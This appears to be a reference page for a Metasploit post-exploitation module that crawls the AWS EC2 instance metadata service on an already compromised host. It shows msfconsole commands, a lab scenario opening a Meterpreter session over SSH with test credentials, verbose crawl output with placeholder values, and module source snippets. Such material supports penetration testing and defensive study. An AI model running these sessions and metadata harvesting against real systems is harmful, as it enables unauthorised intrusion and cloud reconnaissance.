Gather AWS EC2 Instance Metadata - Metasploit
This page contains detailed information about how to use the post/multi/gather/aws_ec2_instance_metadata metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Gather AWS EC2 Instance Metadata
Module: post/multi/gather/aws_ec2_instance_metadata
Source code: modules/post/multi/gather/aws_ec2_instance_metadata.rb
Disclosure date: -
Last modification time: 2018-08-02 15:55:24 +0000
Supported architecture(s): -
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will attempt to connect to the AWS EC2 instance metadata service and crawl and collect all metadata known about the session'd host.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/multi/gather/aws_ec2_instance_metadata
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/multi/gather/aws_ec2_instance_metadata
msf post(aws_ec2_instance_metadata) > show options
... show and set options ...
msf post(aws_ec2_instance_metadata) > set SESSION session-id
msf post(aws_ec2_instance_metadata) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/multi/gather/aws_ec2_instance_metadata")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This module uses an existing session on an AWS EC2 instance to gather
the metadata about the instance. As such, any EC2 instance with curl
is an applicable target.
Verification Steps
- Get session
- Do
use post/multi/gather/aws_ec2_instance_metadata
- Do
set SESSION <session id>
- Do
run
- See loot.
Options
Set VERBOSE
to true
if you would like the AWS EC2 instance metadata to be shown
in addition to being stored.
Scenarios
Default, non-verbose mode:
resource (msf.rc)> use exploit/multi/ssh/sshexec
resource (msf.rc)> set PASSWORD test
PASSWORD => test
resource (msf.rc)> set USERNAME test
USERNAME => test
resource (msf.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
resource (msf.rc)> set RHOST 192.168.2.2
RHOST => 192.168.2.2
resource (msf.rc)> run -j
[*] Exploit running as background job.
resource (msf.rc)> sleep 10
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] 192.168.2.2:22 - Sending stager...
[*] Command Stager progress - 42.09% done (306/727 bytes)
[*] Sending stage (1495599 bytes) to 192.168.2.2
[*] Command Stager progress - 100.00% done (727/727 bytes)
[*] Meterpreter session 1 opened (192.168.1.149:52075 -> 192.168.2.2:4444) at 2016-09-30 06:40:44 -0700
resource (msf.rc)> use post/multi/gather/aws_ec2_instance_metadata
resource (msf.rc)> set SESSION 1
SESSION => 1
resource (msf.rc)> run
[*] Gathering AWS EC2 instance metadata
[+] Saved AWS EC2 instance metadata to to /Users/jhart/.msf4/loot/20160930064126_default_192.168.2.2_aws.ec2.instance_509214.txt
[*] Post module execution completed
Non-default, verbose mode:
resource (msf.rc)> use exploit/multi/ssh/sshexec
resource (msf.rc)> set PASSWORD test
PASSWORD => test
resource (msf.rc)> set USERNAME test
USERNAME => test
resource (msf.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
resource (msf.rc)> set RHOST 192.168.2.2
RHOST => 192.168.2.2
resource (msf.rc)> run -j
[*] Exploit running as background job.
resource (msf.rc)> sleep 10
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] 192.168.2.2:22 - Sending stager...
[*] Command Stager progress - 42.09% done (306/727 bytes)
[*] Sending stage (1495599 bytes) to 192.168.2.2
[*] Command Stager progress - 100.00% done (727/727 bytes)
[*] Meterpreter session 1 opened (192.168.1.149:52775 -> 192.168.2.2:4444) at 2016-09-30 06:55:54 -0700
resource (msf.rc)> use post/multi/gather/aws_ec2_instance_metadata
resource (msf.rc)> set SESSION 1
SESSION => 1
resource (msf.rc)> set VERBOSE true
VERBOSE => true
resource (msf.rc)> run
[*] Fetching http://169.254.169.254/latest/meta-data/
[*] Gathering AWS EC2 instance metadata
[*] Fetching http://169.254.169.254/latest/meta-data/ami-id
[*] Fetching http://169.254.169.254/latest/meta-data/ami-launch-index
[*] Fetching http://169.254.169.254/latest/meta-data/ami-manifest-path
[*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/
[*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/ami
[*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/root
[*] Fetching http://169.254.169.254/latest/meta-data/hostname
[*] Fetching http://169.254.169.254/latest/meta-data/instance-action
[*] Fetching http://169.254.169.254/latest/meta-data/instance-id
[*] Fetching http://169.254.169.254/latest/meta-data/instance-type
[*] Fetching http://169.254.169.254/latest/meta-data/local-hostname
[*] Fetching http://169.254.169.254/latest/meta-data/local-ipv4
[*] Fetching http://169.254.169.254/latest/meta-data/mac
[*] Fetching http://169.254.169.254/latest/meta-data/metrics/
[*] Fetching http://169.254.169.254/latest/meta-data/metrics/vhostmd
[*] Fetching http://169.254.169.254/latest/meta-data/network/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/device-number
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/interface-id
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/ipv4-associations/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/ipv4-associations/192.168.2.2
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/local-hostname
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/local-ipv4s
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/mac
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/owner-id
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/public-hostname
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/public-ipv4s
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/security-group-ids
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/security-groups
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/subnet-id
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/subnet-ipv4-cidr-block
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-id
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-ipv4-cidr-block
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-ipv4-cidr-blocks
[*] Fetching http://169.254.169.254/latest/meta-data/placement/
[*] Fetching http://169.254.169.254/latest/meta-data/placement/availability-zone
[*] Fetching http://169.254.169.254/latest/meta-data/profile
[*] Fetching http://169.254.169.254/latest/meta-data/public-hostname
[*] Fetching http://169.254.169.254/latest/meta-data/public-ipv4
[*] Fetching http://169.254.169.254/latest/meta-data/public-keys/
[*] Fetching http://169.254.169.254/latest/meta-data/public-keys/0/
[*] Fetching http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
[*] Fetching http://169.254.169.254/latest/meta-data/reservation-id
[*] Fetching http://169.254.169.254/latest/meta-data/security-groups
[*] Fetching http://169.254.169.254/latest/meta-data/services/
[*] Fetching http://169.254.169.254/latest/meta-data/services/domain
[*] Fetching http://169.254.169.254/latest/meta-data/services/partition
[+] AWS EC2 instance metadata
{
"ami-id": "ami-2d39803a",
"ami-launch-index": "0",
"ami-manifest-path": "(unknown)",
"block-device-mapping": {
"ami": "/dev/sda1",
"root": "/dev/sda1"
},
"hostname": "ip-192.168.2.2.ec2.internal",
"instance-action": "none",
"instance-id": "i-16fffae",
"instance-type": "t2.medium",
"local-hostname": "ip-192.168.2.2.ec2.internal",
"local-ipv4": "192.168.2.2",
"mac": "aa:bb:cc:dd:ee:ff",
"metrics": {
"vhostmd": "<xml version=\"1.0\" encoding=\"UTF-8\"?>"
},
"network": {
"interfaces": {
"macs": {
"aa:bb:cc:dd:ee:ff": {
"device-number": "0",
"interface-id": "eni-1234ff",
"ipv4-associations": {
"192.168.2.2": "192.168.2.2"
},
"local-hostname": "ip-192.168.2.2.ec2.internal",
"local-ipv4s": "192.168.2.2",
"mac": "aa:bb:cc:dd:ee:ff",
"owner-id": "186638383",
"public-hostname": "ec2-192.168.2.2.compute-1.amazonaws.com",
"public-ipv4s": "192.168.2.2",
"security-group-ids": "sg-123a7",
"security-groups": "launch-wizard-15",
"subnet-id": "subnet-123453d",
"subnet-ipv4-cidr-block": "192.0.2.0/24",
"vpc-id": "vpc-fffffff",
"vpc-ipv4-cidr-block": "192.0.0.0/16",
"vpc-ipv4-cidr-blocks": "192.0.0.0/16"
}
}
}
},
"placement": {
"availability-zone": "us-east-1e"
},
"profile": "default-hvm",
"public-hostname": "ec2-192.168.2.2.compute-1.amazonaws.com",
"public-ipv4": "192.168.2.2",
"public-keys": {
"0": {
"openssh-key": "ssh-rsa <...redacted...> jhart"
}
},
"reservation-id": "r-8675309",
"security-groups": "launch-wizard-15",
"services": {
"domain": "amazonaws.com",
"partition": "aws"
}
}
[+] Saved AWS EC2 instance metadata to to /Users/jhart/.msf4/loot/20160930065628_default_192.168.2.2_aws.ec2.instance_622503.txt
[*] Post module execution completed
Go back to menu.
Msfconsole Usage
Here is how the multi/gather/aws_ec2_instance_metadata post exploitation module looks in the msfconsole:
msf6 > use post/multi/gather/aws_ec2_instance_metadata
msf6 post(multi/gather/aws_ec2_instance_metadata) > show info
Name: Gather AWS EC2 Instance Metadata
Module: post/multi/gather/aws_ec2_instance_metadata
Platform: Unix
Arch:
Rank: Normal
Provided by:
Jon Hart <[email protected]>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module will attempt to connect to the AWS EC2 instance metadata
service and crawl and collect all metadata known about the session'd
host.
References:
http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
Module Options
This is a complete list of options available in the multi/gather/aws_ec2_instance_metadata post exploitation module:
msf6 post(multi/gather/aws_ec2_instance_metadata) > show options
Module options (post/multi/gather/aws_ec2_instance_metadata):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the multi/gather/aws_ec2_instance_metadata post exploitation module:
msf6 post(multi/gather/aws_ec2_instance_metadata) > show advanced
Module advanced options (post/multi/gather/aws_ec2_instance_metadata):
Name Current Setting Required Description
---- --------------- -------- -----------
TARGETURI http://169.254.169.254/latest/meta-data/ yes AWS EC2 Instance metadata URI
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the multi/gather/aws_ec2_instance_metadata module can do:
msf6 post(multi/gather/aws_ec2_instance_metadata) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the multi/gather/aws_ec2_instance_metadata post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(multi/gather/aws_ec2_instance_metadata) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Session does not appear to be on an AWS EC2 instance
Here is a relevant code snippet related to the "Session does not appear to be on an AWS EC2 instance" error message:
35: end
36:
37: def check_aws_metadata
38: resp = simple_get(@target_uri)
39: unless resp =~ /^instance-id$/
40: fail_with(Failure::BadConfig, "Session does not appear to be on an AWS EC2 instance")
41: end
42: resp
43: end
44:
45: def check_curl
curl is not installed
Here is a relevant code snippet related to the "curl is not installed" error message:
42: resp
43: end
44:
45: def check_curl
46: unless cmd_exec("curl --version") =~ /^curl \d/
47: fail_with(Failure::BadConfig, 'curl is not installed')
48: end
49: end
50:
51: def get_aws_metadata(base_uri, base_resp)
52: r = {}
Invalid TARGETURI: <TARGETURI>
Here is a relevant code snippet related to the "Invalid TARGETURI: <TARGETURI>" error message:
87:
88: def setup
89: begin
90: @target_uri ||= URI(datastore['TARGETURI'])
91: rescue ::URI::InvalidURIError
92: fail_with(Failure::BadConfig, "Invalid TARGETURI: #{datastore['TARGETURI']}")
93: end
94: end
95:
96: def simple_get(url)
97: vprint_status("Fetching #{url}")
Go back to menu.
Related Pull Requests
- #10394 Merged Pull Request: Fixes in aws_ec2_instance_metadata module
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7385 Merged Pull Request: Post module to enumerate AWS EC2 instance metadata
References
See Also
Check also the following modules related to this module:
- auxiliary/admin/aws/aws_launch_instances
- auxiliary/cloud/aws/enum_ec2
- auxiliary/cloud/aws/enum_iam
- auxiliary/cloud/aws/enum_s3
- auxiliary/scanner/http/yaws_traversal
- exploit/unix/webapp/awstats_configdir_exec
- exploit/unix/webapp/awstats_migrate_exec
- exploit/unix/webapp/awstatstotals_multisort
- post/multi/escalate/aws_create_iam_user
- post/multi/gather/aws_keys
- post/multi/gather/apple_ios_backup
- post/multi/gather/check_malware
- post/multi/gather/chrome_cookies
- post/multi/gather/dbvis_enum
- post/multi/gather/dns_bruteforce
- post/multi/gather/dns_reverse_lookup
- post/multi/gather/dns_srv_lookup
- post/multi/gather/docker_creds
- post/multi/gather/enum_hexchat
- post/multi/gather/enum_software_versions
- post/multi/gather/enum_vbox
- post/multi/gather/env
- post/multi/gather/fetchmailrc_creds
- post/multi/gather/filezilla_client_cred
- post/multi/gather/find_vmx
- post/multi/gather/firefox_creds
- post/multi/gather/gpg_creds
- post/multi/gather/grub_creds
- post/multi/gather/irssi_creds
- post/multi/gather/jboss_gather
- post/multi/gather/jenkins_gather
- post/multi/gather/lastpass_creds
- post/multi/gather/maven_creds
- post/multi/gather/multi_command
- post/multi/gather/netrc_creds
- post/multi/gather/pgpass_creds
- post/multi/gather/pidgin_cred
- post/multi/gather/ping_sweep
- post/multi/gather/remmina_creds
- post/multi/gather/resolve_hosts
- post/multi/gather/rsyncd_creds
- post/multi/gather/rubygems_api_key
- post/multi/gather/run_console_rc_file
- post/multi/gather/saltstack_salt
- post/multi/gather/skype_enum
- post/multi/gather/ssh_creds
- post/multi/gather/thunderbird_creds
- post/multi/gather/tomcat_gather
- post/multi/gather/ubiquiti_unifi_backup
- post/multi/gather/unix_cached_ad_hashes
- post/multi/gather/unix_kerberos_tickets
- post/multi/gather/wlan_geolocate
Authors
- Jon Hart <jon_hart[at]rapid7.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.